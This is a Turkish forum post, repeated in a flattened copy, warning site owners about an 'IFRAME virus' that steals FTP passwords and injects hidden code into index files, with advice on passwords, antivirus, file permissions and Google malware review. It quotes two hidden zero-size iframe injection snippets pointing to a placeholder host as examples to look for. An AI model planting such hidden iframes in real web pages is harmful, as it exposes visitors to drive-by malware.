Web sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru!

**ProdoziaC** · 21-01-11, 16:01

Web sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru!
Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.
IFRAME Virüsü nedir?
Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.
Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.
Nasıl bulaşır :
1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.
IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.
IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:

<IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>";
Korunmak için yapmanız gerekenler:

1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.
Sitelerinizi kontrol ediniz:

Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.
Zararlı kod bulaşmış dosyalarınızı temizleyiniz.
IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.
Siteniz Google'da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. [Link Görmek ve Forumumuzdan Yararlanmak İçin Üye Olmasınız. ] adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıkla*****, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

IFRAME Virüsü hakkında bilgi için:
[Link Görmek ve Forumumuzdan Yararlanmak İçin Üye Olmasınız. ]

Saygılarımla..

21-01-11, 16:01	#1
ProdoziaC Üyelik tarihi: Jan 2011 Yaş: 25 Mesajlar: 2.606 Konular: 909 Aldığı Teşekkür : 1 NF Puanı : 23890 NF Seviyesi :	Web sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru! Web sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru! Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz. IFRAME Virüsü nedir? Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır. Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır. Nasıl bulaşır : 1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır. 2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index., default. veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir. IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir. IFRAME kod örnekleri: <IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME> echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>"; Korunmak için yapmanız gerekenler: 1. FTP şifrenizi değiştiriniz. 2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız. 3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz. 4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız. Sitelerinizi kontrol ediniz: Sitenizdeki index., default. dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz. Zararlı kod bulaşmış dosyalarınızı temizleyiniz. IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez. Siteniz Google'da saldırgan site olarak listeleniyorsa: IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz: 1. [Link Görmek ve Forumumuzdan Yararlanmak İçin Üye Olmasınız. ] adresine giriş yapınız. 2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız. 3. Sitenizi ekleyerek doğrulayınız. 4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıkla***, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin. 5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın … 6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz. 7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır ! IFRAME Virüsü hakkında bilgi için: [Link Görmek ve Forumumuzdan Yararlanmak İçin Üye Olmasınız. ] Saygılarımla.. ________________ [Link Görmek ve Forumumuzdan Yararlanmak İçin Üye Olmasınız. ] ωєв мαδтєя - ℓιиυχ - δєσ - му-**δqℓ - ωєв ¢σ∂єя ¢σσя∂ιиαтισи'δ

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Benzer Konular
Konu	Konuyu Başlatan	Forum	Cevaplar	Son Mesaj
Duyuru Tarihte Bugün - Önemli Gün ve Haftalar bölümü açılmıştır.	NFCİNİ	Genel Konular	0	05-02-09 13:00
iframe kodu url iframe içinde açlıyo yardım	NFCİNİ	Genel Konular	0	02-02-09 14:51
Ibb'den önemli Duyuru	Şirine	Flash Haberler	0	16-12-08 16:50
Avea hattı olanlar için çok önemli duyuru	NFCİNİ	Genel Konular	0	11-12-08 14:40
Kadınları tehdit eden hastalıklar	Su	Sağlık Rehberi	0	15-08-07 00:39

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)

Etiketlenen Kullanıcılar
Input each user name separated by a comma, like so: User1,User2,User3.